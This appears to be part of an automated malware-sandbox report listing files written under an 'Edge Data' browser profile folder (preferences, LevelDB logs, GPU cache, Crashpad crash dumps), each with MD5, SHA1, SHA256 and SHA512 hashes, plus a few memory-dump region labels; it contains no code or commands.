SHA512 827f6c104ec95e21fb630fcc338f96bef4f800bcb3919de300b3495e1908f661abc37fc3453108180b426fb9e299bece8faa40367cb9edc23d355303fc963072

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\LOG.old

MD5 fc721d46610716d6035eebc1ec5339e8
SHA1 5fb55b017a44d9e3a43b2c36d34628de053c6f3d
SHA256 18812c1340dbf604777237f6022008e60e3b65aa1f1686d43a9d75a83a56a8fd
SHA512 8e79d120afea8d958d10c611742d73b40ebb0dfd77aac6617de5420117f33a993133ca76a0e89c40670163e40d71dad100029e692db26188b497923ed06af73b

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences

MD5 c5740e2cdce08e815b0fa146576b117a
SHA1 cd50fba2d6f8535471a4a08841967b8cd9d64c65
SHA256 08431aa71de8c862b4744bdddbf6a2505b2705a4589e82c482f606a26fc478fd
SHA512 873e93a005b5603a4a421522bce344b9dabc785f631912bf981e34695a0cf2195cc135811e4064bebcf954a01a4984706bf3d000d3f072fba322fe4a815129d4

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\SmartScreen\local\warnStateCache

MD5 3f66f244278461dd07a3feb77a17712f
SHA1 8d570b550699ad0f248ec98b5d678f54248c0a84
SHA256 203ce5c7c1680c6e98f5ceca920e9d904122a9e26a743191e9b0fe1f6584ed60
SHA512 8d4733222e2e0bbc18370055d0602d0389e7a562887e97b2e54073017ffea024e9b1341ed95e28883861ef5e0d4fa9d27ed0894912ffe167632aed2e4cf53e7d

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\SmartScreen\local\download_cache

MD5 24127606dac5cc6142848b0387a3afb6
SHA1 2dd825cba2ded5f73de2f70d3056764788d6b3cd
SHA256 7680b8117dce679eaf37a1c4670506fda78781cfcd994295b5108db18fbbc3a8
SHA512 0c37b62b580255716371554cd47a1d7aa15a92b5376ff66d42cacf1e2fd95c027e7f8781231c4b0d9ccc17521a94f1e719cfd2307853d6d7d72dd8155ba6868b

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\History Provider Cache

MD5 a9851aa4c3c8af2d1bd8834201b2ba51
SHA1 fa95986f7ebfac4aab3b261d3ed0a21b142e91fc
SHA256 e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191
SHA512 41a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Local Storage\leveldb\LOG

MD5 a6041aabb50c61d0184525eb6e857854
SHA1 8cb3c553d5295cc88231a84a53efa8a9cd4ffb33
SHA256 13310a17a50eae1f5601edb9182029d4f848920e8bce3c15116d079865be941e
SHA512 ce6b561082104fb812dd7b791316682d70fce31c50432172b985f2ddcd41fbadd494b22868e8c5d13184c305f89adf535a58e73cac9600823436a7c4ea924119

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Local Storage\leveldb\LOG.old

MD5 d4039b185bc58feb09012f5ea6763ea6
SHA1 98b150d7b4964d087dccdce53b3cfd493e76c3bd
SHA256 16cdd538c97ac7d0c9a1f7731b672705f50399b09e7c03997d8db28fc00eaf25
SHA512 75c9c311b63103bf315ef3417e15c3bb3250078920f3bb3097612cda08a888f9ee6675d9552f3a42417e6fc8ad4f85dc8fc70b9b6b47350007cadd436c4fc23a

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Top Sites

MD5 f44dc73f9788d3313e3e25140002587c
SHA1 5aec4edc356bc673cba64ff31148b934a41d44c4
SHA256 2002c1e5693dd638d840bb9fb04d765482d06ba3106623ce90f6e8e42067a983
SHA512 e556e3c32c0bc142b08e5c479bf31b6101c9200896dd7fcd74fdd39b2daeac8f6dc9ba4f09f3c6715998015af7317211082d9c811e5f9e32493c9ecd888875d7

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\load_statistics.db

MD5 3321b02bc024fb5a6cd075375fbd8d03
SHA1 d6c82e943be01e8a3f558700f37ef0b4b2c6a97a
SHA256 1efcdd2c69107b34cf8636a3172323e4e879fcfaff009a000199423d9d9e3b45
SHA512 e052fb05e10b66f220b125b6352abe9afb0da6a1e90b9b18420d69ae3f7e38c1a261876330d8c8fe163c625881a59bf24123fcfb101ea540b6ecef1a7b16356d

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\index

MD5 bdfb72631c3fc3f374d1606571688a74
SHA1 a3e6b8ada17f07d9e931eac1dbb1c574af5d1e0e
SHA256 40b064cf10a5f6bb65391d7cded1a4aa136d1bf6c7f92248448e214d0dd32880
SHA512 ed4d2fc5b8d38e181b1859e5655686e1adbfc6c5b9f5f1a9c890c44f4194fc4d66751bce598a698a4c293443b40d13cb2eb02c01096437f30166ab04c53bbf29

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\LOG

MD5 1508bb7b5f1227ffbde8d8a70bca5a7f
SHA1 c2a023847e1e34a3a49b7dc2b5a3d9da38759489
SHA256 1a6254cc6471ba03bea563c3eb0aba80e3684f66a259219c7be73fe8082fb0ac
SHA512 36dba24c2b1162c115186f05724c1563949c2f329931a87f984fd93d91a37490982661a00a3aa0c46b9cdaa8e15d44c328294a96797d91cf0b97f4dad110a82e

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\LOG

MD5 2563390c4e4a8f22b14eaadba44d6b5c
SHA1 c06c4aff051fd1553fea171a16c3cd0b15d96b18
SHA256 0b048a07939da5c3e23d51bad663c9b36bc6e98c8d8733d01535c6d914e7b8b1
SHA512 eac36d2577d84cec7e8cead67f579044174d3a4db5dc105b0ebeab51396b31e63d2bb9deb825bced7b149bc0923f0cc4c604ab8c9315a558a4c5ab41d929f4dd

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Session Storage\LOG

MD5 d898747688a407bad58761735576e28a
SHA1 20416f4cdded7fdc5ebc49dadc2d42c47a34b38a
SHA256 0319ceec36611642f05bf961e6d3e9c6d765e6e5dac4c34ed364993d1f3b28b1
SHA512 4ae1292ebe89b282aa64098575137de56fb0c74379b53cacca69b9263a11fc4fe6e0abe5ae46ab390fa8451b3c0905772582274e5ec9b166ebea22f8f626db23

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\000003.log

MD5 d21e0a58064b6969bbaa7cf6e1f3b2e6
SHA1 e9f658a210dc777cb83319b3d70988e2c50aa8e9
SHA256 abfbc1783fa7b03989bda76a6a28a89197dd91aeed2bf5c79c97ae15c432c68f
SHA512 3d8b3666feea739c485f6939938e047c98933336f5dfba68fe06f0605f7ccaa2218816a5f8fe55169f14bc22df55abba5adaccf07f3e29ce5f46e07c615ad9d8

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences

MD5 a3d2cb34b8e4d37c05052761032168b5
SHA1 f77e227aa092d52595ff5a51ec7de4f39af55485
SHA256 0e9abbdf54b1eff6cb6b1c35b818c359f7c33c3f95a828909440b6787db4a74c
SHA512 92a7641d73cf67c31d70bbdbe1f62b391d6806ab8e4b82218de6679dc4dd930809aa83b90cd84fa6ecb438f2313fb2c4fde5aec3537f72ee8bd1b6ed8089ab60

memory/3828-291-0x0000000074FF0000-0x00000000757A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\17ef7bc2-fdbe-42b6-95d5-7488ca6d88d2.dmp

MD5 14160a0118ab6e69f2fe8cd53c4c474c
SHA1 73bf0a01af3d41f3174e96f676d036ebfacecbcb
SHA256 13524884118f6285d9c12e82b2ccfec6c7105ecaf6d8ae5e363dd79dcd1cdd0c
SHA512 a92d0ef8d491b16798bf8f9e05e7cb0d88049628b25890e9aee90b4b62562130069b4af1c5242a8298ca6d93963aad8cae3f3168687e4f183644da0b7bb3d85a

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 7611406137724e7cec16c399c7c2f034
SHA1 a4b080c150fc8f1005d7756973b9ec32caa3f000
SHA256 cd99c23894b278e6976d200e92ce83211222f9bbfa145f12e36e4af939e919ae
SHA512 510154c0adcb00c1805b12c29c2e65c1ebfcc10d54920cfa4cc984c5eb95b20849788dca696017604c351302d098aa7c686e2ad88e33fa85585f7e85dbd2c2b1

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata

MD5 4167b8538f98aa1b836ff976f80505d0
SHA1 c2a5afc3a0767674175ea3777273408689904d6c
SHA256 206e817fb53b656bd7dd333b810583bcb59579ee8d1b3f96cb74aa79446c0d71
SHA512 1d77feac2e8bcc579ba6bb3da5d21045ef5370273d23d0341bb7d93dd3fe88ab1780601cbe4f485ad4e8b134d3a396a7178c4a39f4fbcb895508ead964f38322

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\b26ad9aa-3214-4a47-8290-0b3a03d52f43.dmp

MD5 44d18e42f1cc9954487f7177af98d673
SHA1 a9fd6836ae13429133b199becec052afebb3449c
SHA256 a666802e6834f4a59e7ef3bb3b29683826bb946b9f0f8eaefda1a153f21fb12e
SHA512 40d943a20db5c71a862c236fbe444170e93103ffd1ebb7dce1659079a58c29760b803de4b3d399adff928927412524fdd3f476e652b8749a683767848c62e8f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\b7b5412c-0f31-4f68-b8d8-117c5a64cb06.dmp

MD5 3d0adcb22f223126fa908aab79e27e34
SHA1 e38c6b987d08716e228d597244e6b3bbe062cfe7
SHA256 0ea61e387861621e2d381771c03f1cc470892d2003f28af439f856fc7994575f
SHA512 6c2d157cce21df9465380b5d1606337bf06b9ab8aaf31b1e2f32b1c25308772c901d4ea5120fe8b150e417afd75aecb8cf065a9b1926a3a894cc18bfbd4c6c26

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 f35caa06e7b581d2eda3aecaa3e4d9f8
SHA1 757e6b167c5b86e48f2d792eac9acff085ab010e
SHA256 eafc63c4631f54dc53d6177c198f5624a241f5c9b65d6f8f2f406675b102fa64
SHA512 a71b014c9b3bf7b49f80ee48b164771da005f36bcef2cc9f73ed9123c07de0f9eeae6888556a60a87479cbeb847c902a69a38f13ccc76961b32a83e58551897b

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\17c5331c-04e1-4394-bcf1-bc0f645a3a55.dmp

MD5 fccab65947dce323fdc2a9910af98143
SHA1 b3e71074ef7864965d563bd2a228e9231c2afc48
SHA256 d3526709aae4814b3999cda1ef36009db0d5597910719f12ca71abf5a0e61eb7
SHA512 8985986ed5c355f9a7a928166e4be0abe20cdb3acc1cfd4e11a9e886e39dc2e282674ecb8d2d363e4e8e35d684463d4f5cdec6372ec9ca11dc822d7a8072b328

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\f2cad9a3-2f78-4692-bc1a-dccc604ddfcc.dmp

MD5 4cb967e03898a6a807f0b13eb006db08
SHA1 4f7245db20b731f1c1e2345087f9e96c90a41fc2
SHA256 3efb0b7421c80257b66ddb71f6beb17d5e757fd40556fadd1a6dcd72b8a2e7ae
SHA512 6748c8483e3c060c5a2f0652f1959c428a7f5c8ced99b005878a6f0efc69368d25ffa272ff1f272ac205a9ad7a65657d500b7bd4bceef22f8493c9c052158898

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\31db489b-e828-4397-823c-0d0102b33cef.dmp

MD5 9211e91210e00fa0f8b456127fd430eb
SHA1 be9bb1d2720e6d03cf235578d85fac78b0d6ba7e
SHA256 3878ebbd79eb7d95e79c82fdcb2d8f9959bead1a97f2f9dc022a25042810b125
SHA512 83a6a81641def9291b0aa22eef65155c389f1810efd2fb5648b654f56a2c42ab0b16bc44f408a97a2dea4594beb1d125f8edf7590403087a6b9a9fa26ddc0d19

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 30a55320b8595b3bbbf1d571f3e7de69
SHA1 c2c2b21dae6bbd9985be46c29cc20ae799a58b50
SHA256 0ed872a8f91315be9ea8cc0f19817fa70fc5341f485a3acfebc461fbf1cdc931
SHA512 203926e6259494d5229796db10e4e7e3369edae1bcbddc06b93f075d5f00a3386adb263fd3b39582dc3b360bc1b4db5c63e484f6d7e315b6395708fba8fa7faa

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\87f82129-5ead-48a2-b0e3-8ea1b8d6f770.dmp

MD5 7763c65e0a973272b61650031a5236f0
SHA1 fe28857f691b4934398eb6495c640b50cabf1bbb
SHA256 9fd990648970d76a44a12dabd80f693470b3fa3b7a6bc588ed3a2f4fb52f6de7
SHA512 d7857e5ad588b18d008718762173e34d0bf3ed29421ab6e01e5821b1e05a14857914b42ebb56cd3d323ca8e47600cff84363d726e8aa91a505d754ff66e66aac

memory/5112-630-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/5112-631-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences

MD5 c1aed8f08c873369cd546cab9d570454
SHA1 e62b8e98afdfb08adbee89a27e2f06fdca58a42c
SHA256 5b944599eedeb3f2112b0826e1bab52bd28fc028bee19f47b3403557ad76ece6
SHA512 d003ada4a2baf5667f3ca13808f657ac5bc355905835e96a6d4645bb3c139d7f6c301c68b4e3a8629c511e9bd45246ac95382cf2437b7dbd8d79bec83ceafd8e

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\15bd52b7-d6ad-41f4-84b4-68f51e4ca23c.dmp

MD5 1a45b8f4d7a315274a3cf0afbcb1ba2f
SHA1 34db9e1e5e5d21543a17877bd122beb82fb85902
SHA256 329805f411c22d1509c685065bac8639f588550d0cbfd3350f1d7b254c331cd1
SHA512 dfbc3bdb8d64f06375ff84739da433c45534ae8b22cae24e7ab0858dd3c55442c08a428a250561afd476f7bb5da619ef153a82089be190f21f288b8c8ab7209d

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 4e040cfba3922536fe11f5778a81d553
SHA1 e5e37b0afa0af2f9397a8ba1835af29b5fc8222f
SHA256 92ff1f292a6f3bdbe2fa32213f4d0083de920a02c80c142f26174cccf0fc6a59
SHA512 c3a627abe191c1b713ac956ca0aafbf9674cf57a1531889357e698661f784ce2723ba2cfeaaa893aaafb06b6a87e039f23f301befe62bb1939925008017fcc71

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\2e768fa3-656f-4694-9c33-65a719f69bc5.dmp

MD5 30c7f73799908750dd79bd9b010e153b
SHA1 7b9358263ed0502542f777a9c17bbbb06633b493
SHA256 0505d3ffea0c6e5ab86bcceaae9bdfd2c7446ba1cb9a6f53eb4f179cc6fc86bd
SHA512 8ce0a69aa3a0f99362760ea227d0aae219f466b9328c2adddbddebfe7cb7b0686ed2d197fe6cd3e693e531b6a1693c243fd2cfe9d53cdaf002ae2a8bf8de2c29

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\25b62285-fbe9-4e7e-b851-72c00e743c76.dmp

MD5 c8fe20d3faa55ddac0ac073b0a2b17fa
SHA1 ee56414654804465cf6ae30477b9564eb2869003
SHA256 bc7fa838563116d8599e405de8b4f447de0899b9d9a4c552afab27200ce36e36
SHA512 6614d9c9940e52fe93ecffc851d6cdfba975158525f35753b34526bf56d9559072572fff14b43c1c7dfbf22f5a92834c7b7fb9af1f39ab75ad9f2cf80e0f3aef

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 40058b362c5cc042b8ce03817ae3edd2
SHA1 7a9eaa50781b6b68150cc3da634c8a92e6692368
SHA256 04076c9c8e4b2fce6e2deddc444b13c8f3d477cc3a09fdfad05d0953b090bda6
SHA512 78fd298c7f7e1368a760fd23c95d449d7a16c48c63707d5b41aeb686c5afe5513b30479bd9c92799c5fa61e7a027c1d66b5a13aad7827e79008b5c2f3d3421ab

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\6885d9c7-2b7b-4d95-971b-ff6b17628fbf.dmp

MD5 210e7b0ae2a4a5471de1f04367158644
SHA1 d69f64028a5ec9e8ce9cff6a229680c32aae03a6
SHA256 ae774636ff633d3c8ab389575b1d060a65dfdbc6bb365c4e89c92bedaffdfd97
SHA512 5a6f1982b5eb95d28ebdff1570969eb2476322defc5978679693592fb9047678f4b081b83b208666f45126c839a342506aa306fb81acd12016b0c9475ebbff68

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\fcaf00fe-f577-43fd-81a0-1bd29d290296.dmp

MD5 c9ed7e9c49e675b171fc1315fc022484
SHA1 4d9ca86c7a7794513d040a1f5c177f702ed1f148
SHA256 e6df538e03ad9b0fd647434889f1508b844f479a68e288402b2871be7d933bf8
SHA512 10e28fde43453cbc923721601e56928e78c3390bfb59f6a26f161c79fd2d5570c3a3d2c28cd5e9e5a490382f3d3466a59f67004b53570effb0e81b4c2a9d0960

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\8bd30271-72d7-482b-87e5-9f5d415996d2.dmp

MD5 e1b505102a50d27a6742bbf5d5cb08f8
SHA1 3d884b1ccbae8a30a60f24676380ba43d78ff035
SHA256 37e1f5300c33a3fe314622e66fa561c021fe26e24d8ab055468b0f27413124c2
SHA512 d6eb7556356ea73c5d33d3ee38e1f8dfbe68c0153e4c8a032eda233d54b13c5cb5adf0f743d60c11d89d3d9ba8bb7eaffe95f1ec7ef3345812a2269f876828cd

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata

MD5 30d66600cbfa55df84741cdbd74a0735
SHA1 7fc6f8280f376231745042023d24fa092de294b5
SHA256 8b8c6eedf92df6f758d11df89c4729c265afa24d75ddae844a1e6cb8066114cf
SHA512 4f96324808b576ea5de9ca5971de5f6e11c22e4b62fa6ed68668fbeac8a3f27d6187adfc8bed1e63d3ad8fc0bf9bc691018e4a4e95cd13d1c73f07eddad2d39f

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\609fd34d-2446-458d-8410-fd29da304fc7.dmp

MD5 653991917726c4de59b87cf9709312c2
SHA1 4b177da701a250463452bcd798ca95b25f7869d7
SHA256 f4acab86fe041bec239b0c83683f9b603549bd521d7ee57567143c9ea41d9f65
SHA512 84532a270418f2f324cfb876a36f542cd740c418999d6203acb2db571be5aa4e82eb7fe32fe30f8feb1785970584eed80f873de071ef54edc744c8fd9acca395

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 df194a1223745d5d84ac7a6960a19067
SHA1 19e8baa51d594b041f7178722420f49ed8f64ef4
SHA256 cd406d45d8d1208350b47abc25b065172d80f89e5518a77e28102f451dbb5944
SHA512 936c84f6affdd66da220c5773d8ab2e8cc6c7d06e4881568784351c5fa4d4c97cb3b0ed90fade45d0cc7dc44f33f24e643e12b8a841880d779f6dae8b85a440b

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\ed947f9c-5427-4219-b738-d5bb49f6fa2c.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences

MD5 f0a9d790f792aa35198771f6ffe5e556
SHA1 4a088c4d77cb13371fcdadef016eb2a1583ba616
SHA256 bdc7d0db5cc98b6e9390280daa4013cfc33b2aae8c56a067c1880d1d01324cef
SHA512 da9c867dd716e963c121824e8d1e8f7ba936ab616d46fb12e650aec4c687b9945797e468b12787b8e74f438a89258c490cdc90fafb21668d7e45856c177e911c

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\89ad4e69-7639-498e-8873-bb36789ace18.dmp

MD5 e295726c174e230417abf2408d7002cb
SHA1 8dd0520a1fe3ee87cf6256b0ddcbe8d817d022ef
SHA256 bc95251d9237ee57c8efe4b6526447a59c66e103bac2f530ffec3d875ae4b970
SHA512 3bfa95aaf335059baffcd7f65872e49907f5ab12198acd154dbe080f370041fb6a0570aac6e112b66e52734ac506a987f0d7f0e0060b165a70c67d441ecd176a

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 c4918acaa30d837846941e217208a81c
SHA1 48d7f1099153e8eb36522f53d7c3042f153f82c8
SHA256 512c7aab4c11214823fda4835f8346aa1aef9204d385990398295bf39905e797
SHA512 4c509110cc5e44c2edeeaf1d582da74fa4793d1210075cb5230c889fbb9fb31f6960a27321cf63578380a448607cb7a7d8a7df264e6137adcad6515fa8982c35

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\003464b0-e142-422d-a6c4-ebff6e932fd9.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\380fc30e-40e8-4f31-829b-902113d51c4b.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\1aec9ba8-e99d-401d-9856-7a7139bc0c78.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\c4ac5f02-301c-43e3-b8aa-358f9927c2ae.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\292d474a-9377-497a-b1c1-10b25edddadc.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\f3afa200-2d28-4dd8-aa41-4893f6971d8a.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\7706fb13-207f-4d70-b6fa-25e1450a5d12.dmp
